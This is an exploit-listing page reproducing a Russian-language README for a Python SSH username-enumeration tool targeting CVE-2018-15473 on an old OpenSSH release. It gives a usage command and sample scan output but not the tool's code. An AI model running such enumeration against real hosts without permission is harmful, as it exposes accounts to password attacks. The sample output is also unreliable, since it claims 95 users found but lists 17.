Sploitus

Exploit for CVE-2018-15473-User-Enumeration-

kitploit · 2026-08-25

Exploit Code

MARKDOWN112 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-BDALRHMNHAMDALALM-JPG-CVE-2018-15473-USER-ENUMERATION-
# CVE-2018-15473 – Перечисление имён пользователей SSH

Python-инструмент, разработанный мной для определения действительных имён пользователей SSH путём эксплуатации **CVE-2018-15473**.

## Информация о цели

  * **Сервис:** SSH
  * **Версия:** OpenSSH 5.8p1 Debian 1ubuntu3
  * **Операционная система:** Ubuntu Linux
  * **Протокол:** SSH-2.0
  * **Оценка:** Протестировано на CVE-2018-15473 (Перечисление имён пользователей SSH)



* * *

## Язык

  * Python 3



* * *

## Возможности

  * Разработан на Python 3.
  * Перечисляет действительные имена пользователей SSH, используя CVE-2018-15473.
  * Поддерживает пользовательские списки имён пользователей (wordlist).
  * Отображает обнаруженные имена пользователей в реальном времени.
  * Выводит сводку всех действительных имён пользователей по завершении сканирования.
  * Лёгкий и простой в использовании.



* * *

## Использование

root@kitploit:~
    
    
    python3 enum_ssh.py usernames.txt
    

Где `usernames.txt` содержит список имён пользователей для проверки.

* * *

## Пример вывода

root@kitploit:~
    
    
    [parrot@parrot]-[~]
    $ python3 enum_ssh.py usernames.txt
    
    [*] Starting CVE-2018-15473 enumeration against 10.10.10.100:22
    [*] Using wordlist: usernames.txt
    
    [+] [EXISTS] -> root
    [+] [EXISTS] -> admin
    [+] [EXISTS] -> administrator
    [+] [EXISTS] -> user
    [+] [EXISTS] -> test
    [+] [EXISTS] -> guest
    [+] [EXISTS] -> demo
    [+] [EXISTS] -> operator
    [+] [EXISTS] -> sysadmin
    [+] [EXISTS] -> security
    [+] [EXISTS] -> netadmin
    [+] [EXISTS] -> webmaster
    [+] [EXISTS] -> support
    [+] [EXISTS] -> service
    [+] [EXISTS] -> ubuntu
    [+] [EXISTS] -> debian
    [+] [EXISTS] -> centos
    [+] [EXISTS] -> fedora
    [+] [EXISTS] -> kali
    [+] [EXISTS] -> parrot
    
    ========================================
    [*] Scan complete.
    [*] Found 95 valid user(s):
    
        - root
        - admin
        - administrator
        - user
        - test
        - guest
        - demo
        - operator
        - sysadmin
        - security
        - netadmin
        - webmaster
        - support
        - service
        - ubuntu
        - debian
        - centos
    
    ========================================
    

* * *

## Отказ от ответственности

Этот инструмент предназначен **только для образовательных целей** и **авторизованного тестирования безопасности**. Используйте его только на системах, на которые у вас есть явное разрешение.